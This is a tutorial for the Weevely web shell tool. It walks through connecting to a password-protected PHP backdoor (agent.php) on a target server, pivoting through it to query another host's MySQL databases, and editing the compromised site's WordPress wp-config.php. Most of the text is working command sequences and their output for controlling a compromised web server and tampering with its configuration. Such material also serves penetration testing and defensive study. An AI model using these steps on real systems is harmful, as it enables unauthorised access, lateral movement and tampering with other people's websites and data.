Edit db and code of a web app
This tutorial shows how to browse database and edit PHP scripts pivoting on a target with a strongly limited environment that does not allow to execute shell commands.
This aims to reconfigure Wordpress installed on the target machine in order to use a new database wordpress2 hosted on the server target2.
-
Example PHP configuration:
disable_functions = system, proc_open, popen, passthru, shell_exec, exec, python_eval, perl_system -
Used modules:
sql_console,pico(file_edit),gedit(file_edit)
First of all, we check that the accessibility and the credentials of the new database. Please note that the connection to target2 is done pivoting on target host, as if was a standard ssh/telnet connection.
$ ./weevely.py http://target/agent.php mypassword
[+] weevely 3.0
[+] Target: target
[+] Session: _weevely/sessions/target/agent_0.session
[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.
weevely> :sql_console -user usr2 -passwd pwd2 -host target2
usr2@target2 SQL> show databases;
+--------------------+
| information_schema |
| wordpress2 |
| test |
+--------------------+
usr2@target2 SQL> show tables in wordpress2;
+---------------------------+
| wp_commentmeta |
| wp_comments |
| wp_links |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_terms |
| wp_usermeta |
| wp_users |
+---------------------------+
usr2@target2 SQL> ^DModule 'sql_console' execution terminated
www-data@target:/var/www PHP>Now we're ready to replace the database information in the Wordpress configuration file wp-config.php.
www-data@target:/var/www PHP> cd wordpress
www-data@target:/var/www/wordpress PHP> pico wp-config.php
Remote files can be also edited using local graphical editor like gedit
www-data@target:/var/www/wordpress PHP> gedit wp-config.php
After saving the changes and closing the editor we have the remote adjusted wp-config.php Wordpress file.